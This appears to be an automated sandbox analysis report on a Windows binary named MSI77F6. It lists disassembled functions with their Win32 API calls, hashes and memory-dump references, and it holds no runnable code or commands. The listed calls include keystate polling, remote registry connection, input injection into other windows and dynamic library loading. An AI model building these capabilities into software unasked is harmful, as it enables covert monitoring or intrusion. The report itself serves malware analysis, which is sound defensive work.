                                        • Instruction Fuzzy Hash: F8418171204741EFDB20DF24C884FABBBE4AF89714F14461DF9A59B2D1D778A800CB66
                                        Function 007D0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 007D0478
                                          • Part of subcall function 00777F40: _memmove.LIBCMT ref: 00777F8F
                                          • Part of subcall function 0077A2FB: _memmove.LIBCMT ref: 0077A33D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove$BuffCharLower
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 2411302734-567219261
                                        • Opcode ID: 6d3bd66968b9db56d0cf14cb82d499bfc912c05fdae350976fec511b71ce5a97
                                        • Instruction ID: 5225417328b98390587d7f3251735ee35c276f0c4526bd7338b61a16fbe93e71
                                        • Opcode Fuzzy Hash: 6d3bd66968b9db56d0cf14cb82d499bfc912c05fdae350976fec511b71ce5a97
                                        • Instruction Fuzzy Hash: 0631903450061AEBCF04EF58D841EEEB3B5FF15350F10862AE866A72D1DB79E915CB90
                                        Function 007AC600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007AC684
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007AC697
                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 007AC6C7
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 458670788-1403004172
                                        • Opcode ID: 08c60c3bcf5e2de29276c52fc17e0064c5944ac9b9dc8a4d2681e78321cf4e13
                                        • Instruction ID: 33e6692a4b6cdff5990e6a81b8b2ee74e9a3ae5a933787313e3cf2c8dfd1d03c
                                        • Opcode Fuzzy Hash: 08c60c3bcf5e2de29276c52fc17e0064c5944ac9b9dc8a4d2681e78321cf4e13
                                        • Instruction Fuzzy Hash: 3521E472900108FEDB15EBA4DC8ADFE7779DF86350B108219F426E71E0DB7C4D069650
                                        Function 007C4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C4A60
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C4A86
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007C4AB6
                                        • InternetCloseHandle.WININET(00000000), ref: 007C4AFD
                                          • Part of subcall function 007C56A9: GetLastError.KERNEL32(?,?,007C4A2B,00000000,00000000,00000001), ref: 007C56BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 1951874230-3916222277
                                        • Opcode ID: 89beeb03866771f2095c83a69dbb2314e3531debc809500c0104a7ea32e57eb1
                                        • Instruction ID: 0660dc704385b07a5abaf04be49c901d226ebe76a69aec2790ed5449f43ae476
                                        • Opcode Fuzzy Hash: 89beeb03866771f2095c83a69dbb2314e3531debc809500c0104a7ea32e57eb1
                                        • Instruction Fuzzy Hash: EF21ACB5540208BEEB21EF649C98FBFB7EDEB88744F10801EF105A6140EA689D059778
                                        Function 007738E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007E454E
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • _memset.LIBCMT ref: 00773965
                                        • _wcscpy.LIBCMT ref: 007739B5
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007739C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                        • String ID: Line:
                                        • API String ID: 3942752672-1585850449
                                        • Opcode ID: 3b0d1b44daf6769be34c508ed350db4374e49112487e2c9628c3d8531648672b
                                        • Instruction ID: 5c61c9f980ceee7f7d3db3f7d66949db00236bd0515eb6c6ec8bbb46a02e373d
                                        • Opcode Fuzzy Hash: 3b0d1b44daf6769be34c508ed350db4374e49112487e2c9628c3d8531648672b
                                        • Instruction Fuzzy Hash: 3831B771108340EBDF25EB50DC49FDF77E8BB54794F00891AF289821A1DB78AA58CB96
                                        Function 007D8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0078C657
                                          • Part of subcall function 0078C619: GetStockObject.GDI32(00000011), ref: 0078C66B
                                          • Part of subcall function 0078C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0078C675
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007D8F69
                                        • LoadLibraryW.KERNEL32(?), ref: 007D8F70
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007D8F85
                                        • DestroyWindow.USER32(?), ref: 007D8F8D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                        • String ID: SysAnimate32
                                        • API String ID: 4146253029-1011021900
                                        • Opcode ID: e071b4278353ab9964ce15e301f1483a1d2502eeb6000c1736d95c5a2f2cadb0
                                        • Instruction ID: 61912e68ce7210b354b8a7199111efd875a83cbaf3cbcdb1138a6c2043b3f00b
                                        • Opcode Fuzzy Hash: e071b4278353ab9964ce15e301f1483a1d2502eeb6000c1736d95c5a2f2cadb0
                                        • Instruction Fuzzy Hash: EC21BB71200205EFEF106F64DC44EBF37BAEB48364F10462AFA1497290CB39DC509762
                                        Function 007BE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 007BE392
                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 007BE3E6
                                        • __swprintf.LIBCMT ref: 007BE3FF
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0080DBF0), ref: 007BE43D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume__swprintf
                                        • String ID: %lu
                                        • API String ID: 3164766367-685833217
                                        • Opcode ID: fbcc520dcbe05040979382555219c54fda19e82ad514c2888758072712cbf96b
                                        • Instruction ID: a80799c0a1e1e507521528f6047b4d7d3e093eb39314a69c8a39c9c1f27dc2b4
                                        • Opcode Fuzzy Hash: fbcc520dcbe05040979382555219c54fda19e82ad514c2888758072712cbf96b
                                        • Instruction Fuzzy Hash: 94216035A40208EFCB10EB64CC89EEE77B9EF99710B108069F509D7251D679DE01CB61
                                        Function 007AD7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                          • Part of subcall function 007AD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AD640
                                          • Part of subcall function 007AD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AD653
                                          • Part of subcall function 007AD623: GetCurrentThreadId.KERNEL32 ref: 007AD65A
                                          • Part of subcall function 007AD623: AttachThreadInput.USER32(00000000), ref: 007AD661
                                        • GetFocus.USER32 ref: 007AD7FB
                                          • Part of subcall function 007AD66C: GetParent.USER32(?), ref: 007AD67A
                                        • GetClassNameW.USER32(?,?,00000100), ref: 007AD844
                                        • EnumChildWindows.USER32(?,007AD8BA), ref: 007AD86C
                                        • __swprintf.LIBCMT ref: 007AD886
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                        • String ID: %s%d
                                        • API String ID: 1941087503-1110647743
                                        • Opcode ID: ca523befe6a8ef787e8604b33f9d4035d95172f5be51c6d3115a707468437d72
                                        • Instruction ID: 19b20c8fdd747e9541964d6fb6a1aa6433e04eeab7b7a6a70326fd0971662335
                                        • Opcode Fuzzy Hash: ca523befe6a8ef787e8604b33f9d4035d95172f5be51c6d3115a707468437d72
                                        • Instruction Fuzzy Hash: 2E11B471600205ABDF217F909C89FEE3779AB85744F0080B5BD0EAA186DBBC5D45CB71
                                        Function 007D1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007D18E4
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007D1917
                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007D1A3A
                                        • CloseHandle.KERNEL32(?), ref: 007D1AB0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                        • String ID:
                                        • API String ID: 2364364464-0
                                        • Opcode ID: be4232e86389d33077905b460ad164558c5b4fd6a33fab3dcdc7caba959189ab
                                        • Instruction ID: bfd8b64a30cb8ca76d6a70710c3cc4c0be94dd84650e1bbe42d196b4574d297c
                                        • Opcode Fuzzy Hash: be4232e86389d33077905b460ad164558c5b4fd6a33fab3dcdc7caba959189ab
                                        • Instruction Fuzzy Hash: 9B814170A40215EFDF10EF64C88ABAD7BF5AF44720F54C059F909AF382D7B9A9418B91
                                        Function 007D0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 007D05DF
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007D066E
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 007D068C
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007D06D2
                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 007D06EC
                                          • Part of subcall function 0078F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007BAEA5,?,?,00000000,00000008), ref: 0078F282
                                          • Part of subcall function 0078F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007BAEA5,?,?,00000000,00000008), ref: 0078F2A6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                        • String ID:
                                        • API String ID: 327935632-0
                                        • Opcode ID: b0598923f3e579f19a17570865a2b71358bf6d48076c30bdbcf9ae062b41dc7d
                                        • Instruction ID: 92338c70615936483172cff1b5996e20127b201f61e254838c9fff18a2c46f4c
                                        • Opcode Fuzzy Hash: b0598923f3e579f19a17570865a2b71358bf6d48076c30bdbcf9ae062b41dc7d
                                        • Instruction Fuzzy Hash: CF514A75A00205EFCF10EFA8C499AADB7B5BF49310F14C05AE919AB351DB38ED15CB91
                                        Function 007D2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                          • Part of subcall function 007D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D2AA6,?,?), ref: 007D3B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D2DE0
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D2E1F
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007D2E66
                                        • RegCloseKey.ADVAPI32(?,?), ref: 007D2E92
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007D2E9F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3440857362-0
                                        • Opcode ID: 7b2d39150221c3f86088976ea9ffc062183f6c591d647ee7866a25632fd60d47
                                        • Instruction ID: 7582b22e589b8caaf9e520de6422f785a66f64c4ab26792ec765ac69be018e4a
                                        • Opcode Fuzzy Hash: 7b2d39150221c3f86088976ea9ffc062183f6c591d647ee7866a25632fd60d47
                                        • Instruction Fuzzy Hash: EB517C31204205EFC715EF64C889E6AB7F9BF98304F00881EF595872A1EB78ED06CB52
                                        Function 007DCB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf45f7c0caeee6c4cbe0b352474e7d87ea26cebc7e2440b4a8c0f3dfb29b732a
                                        • Instruction ID: fb7d298efa2dde7ae10c6a0f1c36a445f6e32a7d62f9a9666aebb456e9daf5bd
                                        • Opcode Fuzzy Hash: cf45f7c0caeee6c4cbe0b352474e7d87ea26cebc7e2440b4a8c0f3dfb29b732a
                                        • Instruction Fuzzy Hash: CE410275900106AFDB22DB68CC49FA9BB7AEB09320F144267E919E73D0C738ED01D664
                                        Function 007C1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007C17D4
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007C17FD
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007C183C
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007C1861
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007C1869
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                        • String ID:
                                        • API String ID: 1389676194-0
                                        • Opcode ID: c6e41b28a36750d159c85158cd349fea2e206ab88103c4e2089c4f2f78f1ef5a
                                        • Instruction ID: d2e49b6903260545f5527a4e14e7a4ab2c704d5513c8be301bb9d8aa36d20ca7
                                        • Opcode Fuzzy Hash: c6e41b28a36750d159c85158cd349fea2e206ab88103c4e2089c4f2f78f1ef5a
                                        • Instruction Fuzzy Hash: DD410835A00205EFCF11EF64C985AADBBF5EF08350B14C099E809AB362DB39ED11DB91
                                        Function 0078B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(000000FF), ref: 0078B749
                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0078B766
                                        • GetAsyncKeyState.USER32(00000001), ref: 0078B78B
                                        • GetAsyncKeyState.USER32(00000002), ref: 0078B799
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: d32d4939e5c9b6051b9627065fb5bce5e14ad2b6f76b89d8854bc5844b6e300a
                                        • Instruction ID: 0a7fd1a35e81ce0e81ab715c5620275e59437abfee409a041877b767edd6c75a
                                        • Opcode Fuzzy Hash: d32d4939e5c9b6051b9627065fb5bce5e14ad2b6f76b89d8854bc5844b6e300a
                                        • Instruction Fuzzy Hash: 05418231504259FFEF259F65C848AE9BBB4FB49360F10435AF829922E0C738AD50DFA1
                                        Function 007AC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 007AC156
                                        • PostMessageW.USER32(?,00000201,00000001), ref: 007AC200
                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007AC208
                                        • PostMessageW.USER32(?,00000202,00000000), ref: 007AC216
                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007AC21E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
